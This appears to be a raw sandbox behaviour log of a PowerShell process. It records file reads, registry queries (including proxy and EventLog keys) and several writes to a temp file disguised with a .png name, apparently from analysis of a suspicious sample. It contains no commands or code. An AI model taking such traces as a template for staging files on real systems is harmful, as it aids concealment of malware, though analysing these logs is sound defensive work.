Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_type True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_type True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_type True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz type = file_attributes True 1
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Windows\system32 type = file_attributes True 7
Fn
Get Info C:\Windows type = file_attributes True 4
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\TempxeE84.png type = file_type True 2
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 4096 True 21
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 3687 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 409, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 2228 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 844, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 3736 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 360, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 554 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\TempxeE84.png size = 4096 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\TempxeE84.png size = 53770 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\TempxeE84.png size = 18980 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\TempxeE84.png size = 65536 True 2
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\TempxeE84.png size = 35368 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\TempxeE84.png size = 29200 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\TempxeE84.png size = 18330 True 1
Fn
Data
Registry (215)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 4
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 9
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (5)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
